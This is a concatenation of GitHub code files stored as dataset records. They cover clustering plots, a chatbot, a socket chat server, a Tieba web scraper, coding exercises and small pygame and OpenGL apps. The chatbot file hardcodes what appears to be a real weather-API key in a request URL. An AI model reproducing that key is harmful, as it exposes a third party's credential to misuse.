voisins ( 5 ) \")\r\nplt.plot(trie) ;\r\nplt.show()\r\n\r\n\r\nsilhouette_min = []\r\ndavies_bouldin_score_min = []\r\nnb_clusters_min = []\r\nX_min = np.arange(5, 15, 1)\r\n\r\nsilhouette_eps = []\r\ndavies_bouldin_score_eps = []\r\nnb_clusters_eps = []\r\nX_eps = np.arange(0.1, 1, 0.1)\r\n\r\n#Variation de eps\r\nfor d in X_eps:\r\n\r\n clustering = DBSCAN(eps=d, min_samples=5).fit(datanp)\r\n labels = clustering.labels_\r\n\r\n # Number of clusters in labels, ignoring noise if present.\r\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\r\n n_noise_ = list(labels).count(-1)\r\n \r\n nb_clusters_eps.append(n_clusters_)\r\n silhouette_eps.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_score_eps.append(metrics.davies_bouldin_score(datanp, labels))\r\n\r\n#Variations de min_sample\r\nfor d in X_min:\r\n\r\n clustering = DBSCAN(eps=0.09, min_samples=d).fit(datanp)\r\n labels = clustering.labels_\r\n\r\n # Number of clusters in labels, ignoring noise if present.\r\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\r\n n_noise_ = list(labels).count(-1)\r\n \r\n nb_clusters_min.append(n_clusters_)\r\n silhouette_min.append(metrics.silhouette_score(datanp, labels))\r\n davies_bouldin_score_min.append(metrics.davies_bouldin_score(datanp, labels))\r\n \r\n \r\n print(\"Estimated number of clusters: %d\" % n_clusters_)\r\n print(\"Estimated number of noise points: %d\" % n_noise_)\r\n \r\n unique_labels = set(labels)\r\n core_samples_mask = np.zeros_like(labels, dtype=bool)\r\n core_samples_mask[clustering.core_sample_indices_] = True\r\n \r\n colors = [plt.cm.Spectral(each) for each in np.linspace(0, 1, len(unique_labels))]\r\n for k, col in zip(unique_labels, colors):\r\n if k == -1:\r\n # Black used for noise.\r\n col = [0, 0, 0, 1]\r\n \r\n class_member_mask = labels == k\r\n \r\n xy = datanp[class_member_mask & core_samples_mask]\r\n plt.plot(\r\n xy[:, 0],\r\n xy[:, 1],\r\n \"o\",\r\n markerfacecolor=tuple(col),\r\n markeredgecolor=\"k\",\r\n markersize=14,\r\n )\r\n \r\n xy = datanp[class_member_mask & ~core_samples_mask]\r\n plt.plot(\r\n xy[:, 0],\r\n xy[:, 1],\r\n \"o\",\r\n markerfacecolor=tuple(col),\r\n markeredgecolor=\"k\",\r\n markersize=6,\r\n )\r\n \r\n plt.title(f\"Estimated number of clusters: {n_clusters_}\")\r\n plt.show()\r\n\r\n\r\n\r\nplt.bar(X_min, nb_clusters_min, 
width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('Nb de clusters')\r\nplt.title ( \"Nb de clusters en fonction de min_sample\" )\r\nplt.show ()\r\n\r\nplt.bar(X_min, silhouette_min, width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('coef de Silhouette')\r\nplt.title ( \"Comparaison du coefficient de silhouette pour différentes valeurs de min_sample\" )\r\nplt.show ()\r\n\r\nplt.bar(X_min, davies_bouldin_score_min, width = 0.75)\r\nplt.grid()\r\nplt.xlabel('valeur de min_sample')\r\nplt.ylabel('Indice de Davies Bouldin')\r\nplt.title ( \"Comparaison de l'indice de Davies Bouldin pour différentes valeurs de min_sample \" )\r\nplt.show ()\r\n\r\n\r\nplt.bar(X_eps, nb_clusters_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('Nb de clusters')\r\nplt.title ( \"Nb de clusters en fonction de eps\" )\r\nplt.show ()\r\n\r\nplt.bar(X_eps, silhouette_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('coef de Silhouette')\r\nplt.title ( \"Comparaison du coefficient de silhouette pour différentes valeurs de eps\" )\r\nplt.show ()\r\n\r\nplt.bar(X_eps, davies_bouldin_score_eps, width = 0.075)\r\nplt.grid()\r\nplt.xlabel('valeur de eps')\r\nplt.ylabel('Indice de Davies Bouldin')\r\nplt.title ( \"Comparaison de l'indice de Davies Bouldin pour différentes valeurs de eps \" )\r\nplt.show ()","repo_name":"Madeliine/TP_Clustering","sub_path":"dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2976542765","text":"import requests\nimport time\nfrom time import sleep\nimport os\n\nfrom tqdm import tqdm \nfrom googlesearch import search\n\nimport sys\n\ndef spinning_cursor():\n while True:\n for cursor in '|/-\\\\':\n yield cursor\n\nprint(\"I can also tell you useful things like the weather!\")\nsleep(1.0)\nweathercity = input(\"What town/city are you in? \")\nweather = requests.get('http://api.openweathermap.org/data/2.5/weather?q='+weathercity+',uk&units=metric&appid=886705b4c1182eb1c69f28eb8c520e20')\n\n\ndata = weather.json()\n\ntemp = data['main']['temp']\ndescription = data['weather'][0]['description']\ncityname = data['name']\nweatherprint =\"In {}, it is currently {}° with {}.\"\nspinner = spinning_cursor()\nfor _ in range(25):\n sys.stdout.write(next(spinner))\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\b')\nprint(weatherprint.format(cityname, temp, description))\n\nsleep(2.0)\n\n\"\"\"GOOGLE SEARCH\"\"\"\n\nprint(\"\\nI can also make Google searches!\")\nsleep(0.5)\nquery = input(\"What do you wanna search? \")\nfor _ in range(25):\n sys.stdout.write(next(spinner))\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\b')\nprint(\"Here are the top 5 results:\")\nfor i in search(query, tld=\"co.in\", num=5, stop=5):\n print(i)\n\n\nmusicreq = input(\"What song would you like to hear? 
Please copy the file path and paste it hear, if you need help go to:\\nhttps://url.mystik01.me/help\\nPlease paste file path here: \")\nos.startfile(musicreq)","repo_name":"Mystik01/chatbot","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71390770408","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport threading\nimport time\n\nhost = \"127.0.0.1\"\nuser_list = {}\nnotice_flag = 0\n\ndef msg_func(msg, port):\n print(msg)\n for con in user_list.values():\n if port == int(con.getsockname()[1]):\n try:\n con.send(msg.encode('utf-8'))\n except:\n print(\"연결이 비 정상적으로 종료된 소켓 발견\")\n \ndef msg_user_list(port):\n msg = \"!@#$\"\n for i in user_list.keys():\n if port == int(user_list[i].getsockname()[1]):\n msg = msg +\",\"+ i\n print(msg)\n for con in user_list.values():\n if port == int(con.getsockname()[1]):\n # msg = msg + \n try:\n con.send(msg.encode('utf-8'))\n except:\n print(\"연결이 비 정상적으로 종료된 소켓 발견\")\n \ndef handle_receive(client_socket, addr, user, port):\n msg = \"---- %s님이 들어오셨습니다. ----\"%user\n msg_func(msg, port)\n msg_user_list(port)\n while 1:\n data = client_socket.recv(1024)\n string = data.decode('utf-8')\n\n if \"/종료\" in string:\n msg = \"---- %s님이 나가셨습니다. ----\"%user\n #유저 목록에서 방금 종료한 유저의 정보를 삭제\n del user_list[user]\n msg_func(msg, port)\n msg_user_list(port)\n break\n string = \"%s : %s\"%(user, string)\n msg_func(string, port)\n client_socket.close()\n\ndef accept_func(port, num):\n #IPv4 체계, TCP 타입 소켓 객체를 생성\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #포트를 사용 중 일때 에러를 해결하기 위한 구문\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #ip주소와 port번호를 함께 socket에 바인드 한다.\n #포트의 범위는 1-65535 사이의 숫자를 사용할 수 있다.\n server_socket.bind((host, port))\n\n #서버가 최대 5개의 클라이언트의 접속을 허용한다.\n server_socket.listen(num)\n\n while 1:\n try:\n #클라이언트 함수가 접속하면 새로운 소켓을 반환한다.\n client_socket, addr = server_socket.accept()\n except KeyboardInterrupt:\n for user, con in user_list:\n con.close()\n server_socket.close()\n print(\"Keyboard interrupt\")\n break\n user = client_socket.recv(1024).decode('utf-8')\n user_list[user] = client_socket\n \n receive_thread = threading.Thread(target=handle_receive, args=(client_socket, addr,user, port))\n receive_thread.daemon = True\n receive_thread.start()\n\ndef server_open(port, num):\n accept_func(port, num)\n","repo_name":"ggaebi99/Chat_PyQt","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22107567214","text":"import os\nimport random\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport time\n#import sys\nimport traceback\nimport threading\nimport redis\nimport re\nfrom pymongo import MongoClient\nimport socket\nimport arrow\nimport dateutil\nimport datetime\nfrom urllib.request import quote\nimport myUtils\nfrom aiohttp import ClientSession\nimport aiohttp\nimport asyncio\n#import urllib\n\nesheader={'index_name':'tieba_posts','type_name':'tieba_posts'}\n\nemoji_pattern = re.compile(\"[\"\n \"\\U0001F600-\\U0001F64F\" # emoticons\n \"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n \"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n \"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n\ndef remove_emoji(text):\n return emoji_pattern.sub(r'', text)\n\ndef deal_dayErr(m,d,tz):\n 
try:\n last_reply_at = arrow.get(arrow.now().format('YYYY-') + '-'.join([m,d]), 'YYYY-MM-DD').replace(tzinfo=dateutil.tz.gettz(tz)).timestamp \n except ValueError:\n d=str(int(d)-1)\n last_reply_at=deal_dayErr(m,d,tz)\n return last_reply_at\n \ndef parser_time(_time):\n tz = 'Asia/Hong_Kong'\n #tz = 'Asia/BeiJing'\n if _time.find(':') >0:\n last_reply_at = arrow.get(arrow.now().format('YYYY-MM-DD')+' '+_time,'YYYY-MM-DD HH:mm').replace(tzinfo=dateutil.tz.gettz(tz)).timestamp\n elif _time.find('-') >0:\n m,d = _time.split('-')\n if len(m) == 1:\n m = '0'+m\n if len(d) == 1:\n d = '0'+d\n last_reply_at=deal_dayErr(m,d,tz)\n else:\n last_reply_at = parser_time('1970-01-01 00:00')\n if last_reply_at > int(time.time()):\n last_reply_at-=(365*24*3600)\n return last_reply_at*1000\n\n\nasync def item_perk(tie_list):\n try:\n #rcli=redis.StrictRedis(connection_pool=pool)\n #for tie in tie_list:\n #if tie and len(tie.keys()):\n #rcli.rpush('tie2es_list',tie)\n #db.tieba_undeal_ties.update({'_id':tie['id']},tie,True)\n async with ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:\n async with session.post('http://59.110.52.213/stq/api/v1/pa/baidutieba/add',headers={'Content-Type':'application/json'},data=json.dumps(tie_list)):\n pass\n # text=await res.text()\n # return text\n #requests.post('http://59.110.52.213/stq/api/v1/pa/baidutieba/add',headers={'Content-Type':'application/json'},data=json.dumps(tie_list))\n print(tie_list[0]['id'],'_This post has been completion information and deposited in the redis, ready to push the Elasticsearch!')\n except:\n traceback.print_exc()\n\n\n\nasync def parserAndStorage_ties(tie,db):\n #rcli = redis.StrictRedis(connection_pool=pool)\n try:\n if tie and len(tie.keys()):\n tie_list=[]\n ba_name=tie['ba_name']\n tie=tie['tie']\n data_field=json.loads(tie.get('data-field'))\n last_reply=tie.select_one('div.t_con div.j_threadlist_li_right div.threadlist_detail div.threadlist_author span.threadlist_reply_date')\n authpr_info=tie.select('span.tb_icon_author')\n tie_url='http://tieba.baidu.com'+tie.select('div.threadlist_title a.j_th_tit')[0].get('href').split('?')[0]\n author_name=data_field['author_name'] if data_field['author_name'] else 'unkown'\n tiezi={\n 'tieba_id':remove_emoji(ba_name),\n 'author_name':remove_emoji(author_name),\n 'reply_num':data_field['reply_num'],\n 'id':str(data_field['id']),\n 'title':remove_emoji(tie.select_one('div.threadlist_title a.j_th_tit').get('title')),\n 'tie_url':tie_url.split('?')[0],\n 'author_id':str(json.loads(tie.select_one('span.tb_icon_author').get('data-field'))['user_id']) if len(authpr_info) else '',\n 'last_reply_at':parser_time(last_reply.text.strip()) if last_reply else parser_time('00:00'),\n 'date':parser_time('00:00'),\n 'content':'',\n 'author_id':'',\n 'created_at':int(time.time()*1000)\n }\n tieFlag=await myUtils.tieInfo_fetch(tiezi,db)\n return tieFlag\n\n except:\n traceback.print_exc()\n return True\n\n\n\ndef tiebaInfo_fetch(bs,name):\n #rcli = redis.StrictRedis(connection_pool=pool)\n today=time.strftime(\"%Y-%m-%d\",time.localtime())\n version=time.mktime(time.strptime(today,\"%Y-%m-%d\"))#datetime.datetime.strptime(today,\"%Y-%m-%d\")\n spans=bs.select('span.red_text')\n ba_t_num=int(spans[0].text if len(spans) else 0)\n ba_m_num=int(spans[1].text if len(spans) else 0)\n ba_p_num=int(spans[2].text if len(spans) else 0)\n return {'id':(name+'_'+today),'ba_t_num':ba_t_num,'ba_m_num':ba_m_num,'ba_p_num':ba_p_num,'ba_name':name,'version':version}\n\n\n \n\ndef 
fetch_tiezi(pool,db1,db2):\n print('start fetch_tiezi')\n rcli = redis.StrictRedis(connection_pool=pool)\n while True:\n try:\n if db1.client.is_primary :\n db=db1\n else :\n db = db2\n item = eval(rcli.brpoplpush('tieba_url_list','tieba_url_list',0).decode())\n ba_name=item['name']\n name_urlcode=quote(ba_name) if not ba_name.endswith('吧') else quote(ba_name[0:-1])\n tiebaInfo={}\n pnum=0\n #max_page=50\n isContinue=True\n url='http://tieba.baidu.com/f?kw={name}'.format(name=name_urlcode)\n noNPC=0\n while isContinue:#pnum<=max_page and isContinue:\n #url='http://tieba.baidu.com/f?kw={name}&pn={pnum}'.format(name=name_urlcode,pnum=pnum)\n res=requests.get(url,timeout=30)\n try:\n bs=BeautifulSoup(res.content.decode('utf-8'), 'html.parser')\n except UnicodeDecodeError:\n bs=BeautifulSoup(res.text, 'html.parser')\n #ties=bs.select('li[data-field]')\n if pnum==0:\n tiebaInfo=tiebaInfo_fetch(bs,ba_name)\n db.tiebaInfo.update({'_id':tiebaInfo['id']},tiebaInfo,True)\n del tiebaInfo['id']\n del tiebaInfo['version']\n del tiebaInfo['ba_name']\n ties=bs.select('li.j_thread_list.clearfix')\n if not len(ties):\n break\n #ties=bs.select('li[data-field]')\n tasks=list(asyncio.ensure_future(parserAndStorage_ties({'ba_name':ba_name,'tie':tie},db)) for tie in ties)\n print('tasks:',len(tasks))\n loop=asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n #print(len(ties))\n \n #print(ties['ties'][0])\n #print('Post information is caught, wait to parse!')\n created_at=rcli.hget('tieba_created_at_hash',ba_name)\n tie_list=[]\n for task in tasks:\n tiezi=task.result()\n fullTie=dict(tiebaInfo,**tiezi,**esheader)\n #print(remove_emoji(json.dumps(fullTie)))\n if created_at and fullTie['last_reply_at'] < int(created_at) - (30*24*3600*1000):\n #item_perk(tie_list,pool)\n isContinue=False\n #break\n elif fullTie['last_reply_at'] < int(time.mktime(time.strptime('2017-01-01','%Y-%m-%d')))*1000:\n isContinue=False\n #break\n else:\n #item_perk([fullTie])\n tie_list.append(fullTie)\n print(time.strftime(\"%Y-%m-%d\",time.localtime(fullTie['last_reply_at']/1000)))\n tasks=list(asyncio.ensure_future(item_perk([tie])) for tie in tie_list)\n loop=asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait(tasks))\n print(isContinue) \n if isContinue:\n # _next=bs.select_one('div#frs_list_pager a.next')\n # _last=bs.select_one('div#frs_list_pager a.last')\n _next=bs.select_one('div#frs_list_pager span.pagination-current.pagination-item + a')\n if not (_next) and noNPC<5:\n print('_page:',_next)\n noNPC+=1\n elif noNPC>=5:\n break\n #max_page=int(re.findall(r'\\d+',_next['href'])[-1])\n url='http:'+_next['href'] if _next else '{}pn={}'.format(url.split('pn=')[0],pnum+50)\n print(url)\n #pnum+=50\n pnum=int(re.findall(r'\\d+',url)[-1])\n else:\n break\n \n rcli.hset('tieba_created_at_hash',ba_name,int(time.mktime(datetime.date.today().timetuple()))*1000)\n except:\n traceback.print_exc()\n","repo_name":"Arrow-Dark/baidutieba","sub_path":"tiezi_fetch.py","file_name":"tiezi_fetch.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73431820327","text":"#using a sliding windo in theory, doing a prefix mulitplicaiton before the index\n#and setting the result array to prefix multiplication, then calculating a postfix\n#product and mulitplying it to answer array which gets us everyting but the index in\n#multiplication!, and sends out that reusltant answer array\n\nclass Solution(object):\n def 
productExceptSelf(self, nums):\n answer = [1] * len(nums)\n prefix = 1\n for i in range(len(nums)):\n answer[i] = prefix\n prefix *= nums[i]\n postfix =1\n for i in range(len(nums)-1,-1,-1):\n answer[i] *= postfix\n postfix *= nums[i]\n return answer\n\n ","repo_name":"pbairol/leetcode","sub_path":"Product of Array Except itself 238/product_array_2-238.py","file_name":"product_array_2-238.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1916669425","text":"#DayDayUp\n#dayfactor=0.005\n#dayup=pow(1+dayfactor,365)\n#daydown=pow(1-dayfactor,365)\n#print(\"dayup is {:.5f},daydown is {:.5f}\".format(dayup,daydown))\n\n\n#dayup=1.0\n#dayfactor=0.01\n#for i in range(365):\n# if i % 7 in [6,0]:\n# dayup*=(1-dayfactor)\n# else:\n# dayup*=(1+dayfactor)\n#print(\"dayup is {:.5f}\".format(dayup))\n\n\ndef dayup(dayfactor):\n dayup=1.0\n for i in range(365):\n if i % 7 in [6,0]:\n dayup*=(1-dayfactor)\n else:\n dayup*=(1+dayfactor)\n return dayup\n\ndayfactor=0.01\nwhile dayup(dayfactor) < pow(1.01,365):\n dayfactor+=0.0001\nprint(\"{:.4f}\".format(dayfactor))\n\n","repo_name":"Charlie-Wilson0211/Python-Learning-Note","sub_path":"DayDayUp.py","file_name":"DayDayUp.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3886384269","text":"import pygame\n\n# screen size is defined here\ndisplay_width = 1350\ndisplay_height = 900\n\n\n# Initilaizes the pygame module and creates the canvas\nclass pygame_starter():\n def __init__(self):\n pygame.init()\n self.game_display = pygame.display.set_mode((display_width, display_height)) # display canvas\n pygame.display.set_caption(\"Blackjack\") # display header caption\n\n\n# Class that handles placing text on screen\nclass pygame_text():\n # creates a text object using text, fontsize and coordinates\n def __init__(self, text, size=20, x_coord=0, y_coord=0):\n self.text = text\n self.size = size\n self.x_coord = x_coord\n self.y_coord = y_coord\n\n # Text of the object can be changed, with set_text\n def set_text(self, text):\n self.text = text\n\n # Text size can be changed\n def set_size(self, size):\n self.size = size\n\n # Text location can be changed, useful for animation\n def set_location(self, x_coord, y_coord):\n self.x_coord = x_coord\n self.y_coord = y_coord\n\n # Displays the object on to our display object\n def display(self, current_display_object):\n diplayed_text = pygame.font.Font(\"freesansbold.ttf\", self.size) # Font and size\n # Created a surface and a rectangle for the text\n text_surface, text_rectangle = text_objects(self.text, diplayed_text)\n # centers the text rectangle\n text_rectangle.center = (self.x_coord, self.y_coord)\n # puts the text onto the current display object\n current_display_object.blit(text_surface, text_rectangle)\n\n\n# creates a text object with text and font\ndef text_objects(text, font):\n text_surface = font.render(text, True, (255, 255, 255)) # creates a text surface where the text is\n return text_surface, text_surface.get_rect() # returns the text surface with its rectangle\n\n\n# Class for buttons\nclass button(object):\n def __init__(self, text, font_size, x_coord, y_coord, width, height, inactive_color, active_color, action=None):\n self.text = text\n self.font_size = font_size\n self.x_coord = x_coord\n self.y_coord = y_coord\n self.width = width\n self.height = height\n self.active = active_color\n 
self.inactive = inactive_color\n self.action = action\n\n # function that displays the button\n def display_button(self, current_display_object):\n # tracks mouse movement and clicks\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n # if mouse is over the button, it will light up and use active color instead of inactive\n if self.x_coord + self.width > mouse[0] > self.x_coord and self.y_coord + self.height > mouse[1] > self.y_coord:\n pygame.draw.rect(current_display_object, self.active, (self.x_coord, self.y_coord, self.width, self.height))\n\n if click[0] == 1:\n return \"close\"\n # if is clicked, will run the action\n if click[0] == 1 and self.action != None:\n self.action()\n return True\n else:\n pygame.draw.rect(current_display_object, self.inactive,\n (self.x_coord, self.y_coord, self.width, self.height))\n\n # creates a text object for the button using pygame_text class that we created\n text = pygame_text(self.text, self.font_size, self.x_coord + self.width / 2, self.y_coord + self.height / 2)\n # Displays the text onto our display object\n text.display(current_display_object)\n","repo_name":"KristerL/UT_BLACKJACK","sub_path":"pygame_handler.py","file_name":"pygame_handler.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5973245853","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 6 15:45:38 2018\n\n@author: vpapg\n\"\"\"\n\n# Write a for loop to print out the characters of a string, one per line.\n\ns = 'Sorry seems to be the hardest word'\n\nfor ch in s:\n print(ch)","repo_name":"vpapg/NLTK_book_py3","sub_path":"Ch03/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70093323047","text":"# Author: Kaan Eraslan\n\nfrom PySide2 import QtWidgets\nfrom tutorials.utils.window import GLWindow as AppWindow\nfrom glevents import EventsGL\nimport sys\n\n\nclass EventAppWindow(AppWindow):\n \"Overriding base class with event methods\"\n\n def __init__(self,\n glwidget: QtWidgets.QOpenGLWidget,\n parent=None,\n ):\n super().__init__(glwidget,\n parent)\n self.camX.setRange(-520.0, 520.0)\n self.camY.setRange(-520.0, 520.0)\n self.xSlider.setRange(-180.0, 180.0)\n self.ySlider.setRange(-180.0, 180.0)\n self.zSlider.setRange(-180.0, 180.0)\n self.upBtn.clicked.connect(self.moveCameraForward)\n self.downBtn.clicked.connect(self.moveCameraBackward)\n self.leftBtn.clicked.connect(self.moveCameraLeft)\n self.rightBtn.clicked.connect(self.moveCameraRight)\n self.camX.valueChanged.connect(self.turnCameraX)\n self.camY.valueChanged.connect(self.turnCameraY)\n self.xSlider.valueChanged.connect(self.rotateCubes)\n self.ySlider.valueChanged.connect(self.rotateCubes)\n self.zSlider.valueChanged.connect(self.rotateCubes)\n #\n self.lastCamXVal = self.camX.value()\n #\n self.lastCamYVal = self.camY.value()\n\n def moveGLCamera(self, direction: str):\n self.glWidget.moveCamera(direction)\n\n def moveCameraForward(self):\n self.moveGLCamera(\"forward\")\n\n def moveCameraBackward(self):\n self.moveGLCamera(\"backward\")\n\n def moveCameraLeft(self):\n self.moveGLCamera(\"left\")\n\n def moveCameraRight(self):\n self.moveGLCamera(\"right\")\n\n def turnCameraX(self, newVal: int):\n \"Turn camera around\"\n offsetx = newVal - self.lastCamXVal\n valy = self.camY.value() - self.lastCamYVal\n 
self.glWidget.turnAround(x=float(offsetx),\n y=float(valy))\n self.lastCamXVal = newVal\n\n def turnCameraY(self, newVal: int):\n \"Turn camera around\"\n offsety = newVal - self.lastCamYVal\n valx = self.camX.value() - self.lastCamXVal\n self.glWidget.turnAround(x=float(valx),\n y=float(offsety))\n self.lastCamYVal = newVal\n\n def rotateCubes(self):\n rx = self.xSlider.value()\n ry = self.ySlider.value()\n rz = self.zSlider.value()\n self.glWidget.rotateCubes(rx, ry, rz)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = EventAppWindow(EventsGL)\n window.show()\n res = app.exec_()\n sys.exit(res)\n","repo_name":"D-K-E/pyside-opengl-tutorials","sub_path":"tutorials/06-events/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"71485929769","text":"import numpy as np, cv2\n\nimage = np.zeros((300, 400), np.uint8) #300행 400열의 행렬 생성\nimage[:] = 100 # 회색(100)바탕 영상 생성\n\ntitle= 'Window' #title 변수에 'Window'라는 윈도우 이름 할당\ncv2.namedWindow(title, cv2.WINDOW_AUTOSIZE) #크기 재조정 불가능한 윈도우 생성\ncv2.imshow(title, image)\ncv2.resizeWindow(title, 500, 600)\ncv2.imshow(title, image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"DAASHeo/2022_Machine_Vision","sub_path":"Unit4/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26438443050","text":"def find_two_smallest(L):\n \"\"\"리스트 L에서 가장 작은 두 값의 인덱스를 튜플로 반환한다.\n\n >>> counts = [809, 834, 477, 478, 307, 122, 96, 102, 324, 476]\n >>> find_two_smallest(counts)\n (6, 7)\n \"\"\"\n\n # 리스트 맨 앞에 가장 작은 두 수가 오도록 리스트를 정렬한 복사본을 구한다.\n sorted_L = sorted(L)\n\n # 원래 리스트 L에서 두 수의 인덱스를 구한다.\n fir_min_ind = L.index(sorted_L[0])\n sec_min_ind = L.index(sorted_L[1])\n\n return fir_min_ind, sec_min_ind\n\n","repo_name":"icymint8/2023comgaesil","sub_path":"2023-05-16 알고리즘/sort_then_find.py","file_name":"sort_then_find.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936769336","text":"num_dragons = int(input())\nall_dragons = {}\n\nfor _ in range(1, num_dragons + 1):\n arg_1, arg_2, arg_3, arg_4, arg_5 = input().split(\" \")\n dragon_type, dragon_name = arg_1, arg_2\n\n if arg_3.isdigit():\n damage = int(arg_3)\n else:\n damage = 45\n\n if arg_4.isdigit():\n health = int(arg_4)\n else:\n health = 250\n\n if arg_5.isdigit():\n armor = int(arg_5)\n else:\n armor = 10\n\n if dragon_type not in all_dragons:\n all_dragons[dragon_type] = [(dragon_name, damage, health, armor)]\n else:\n for item in all_dragons[dragon_type]:\n if item[0] == dragon_name:\n idx_item = all_dragons[dragon_type].index(item)\n all_dragons[dragon_type][idx_item] = (dragon_name, damage, health, armor)\n break\n else:\n all_dragons[dragon_type].append((dragon_name, damage, health, armor))\n\nfor key, value in all_dragons.items():\n value.sort()\n\n ave_damage = sum(i[1] for i in value)/len(value)\n ave_health = sum(i[2] for i in value)/len(value)\n ave_armour = sum(i[3] for i in value)/len(value)\n print(f\"{key}::({ave_damage:.2f}/{ave_health:.2f}/{ave_armour:.2f})\")\n\n for i in value:\n print(f\"-{i[0]} -> damage: {i[1]}, health: {i[2]}, armor: {i[3]}\")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Fundamentals/More 
Exercises/More_exercises_6/qu_5.py","file_name":"qu_5.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"462950386","text":"# Mathilde HAVARD-SEDENO\n# M2 ORO\n\nimport math, robot, tools, pathPlanning\nimport numpy as np\nfrom matplotlib import pyplot\n\ndef pathFollowing(r, commands, loop=False):\n\n print(\"\\n\\t\\t###########################################\")\n print(\"\\t\\t ############## PATH FOLLOWING ###############\")\n print(\"\\t\\t #############################################\\n\")\n\n print(\" Launching the path following procedure...\")\n\n # We go to the first pose\n r.actuate(commands[0])\n # and start drawing\n r.pen_down()\n\n # then we go through all the poses\n for (x,y) in commands:\n r.actuate([x,y])\n\n # if we want the drawing to go back to the first pose -- as in a circle for instance --\n if loop==True:\n r.actuate(commands[0])\n\n r.pen_up()\n input(\"Press [ENTER] to continue ...\")\n\n # and to the initial position\n r.go_home()\n","repo_name":"mHavardSedeno/src","sub_path":"pathFollowing.py","file_name":"pathFollowing.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72182063208","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndef checkParenthesis(sentence):\r\n stack = []\r\n for i in sentence:\r\n if i == '(' or i == '[':\r\n stack.append(i)\r\n elif (i == ')' or i == ']') and len(stack) == 0:\r\n return False\r\n elif i == ')' and stack.pop() != '(':\r\n return False\r\n elif i == ']' and stack.pop() != '[':\r\n return False\r\n \r\n if len(stack) == 0:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n # get sentence\r\n sentence = input().rstrip()\r\n while sentence[-1] != \".\":\r\n sentence += input().rstrip()\r\n\r\n # if sentence is end, exit program\r\n if sentence == \".\":\r\n break\r\n \r\n if checkParenthesis(sentence):\r\n print(\"yes\")\r\n else:\r\n print(\"no\")\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Silver/4949. 균형잡힌 세상/균형잡힌 세상.py","file_name":"균형잡힌 세상.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5238434696","text":"\"\"\"\nEXERCÍCIO 091: Jogo de Dados em Python\n\nCrie um programa onde 4 jogadores joguem um dado e tenham resultados aleatórios. \n Guarde esses resultados em um dicionário. \n\nNo final, coloque esse dicionário em ordem, sabendo que o vencedor tirou o maior número no dado.\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\nfrom operator import itemgetter\n\njogadas = dict()\nranking = dict()\n\nprint('VALORES SORTEADOS:')\n\nfor i in range(1, 5):\n valor = randint(1, 6)\n 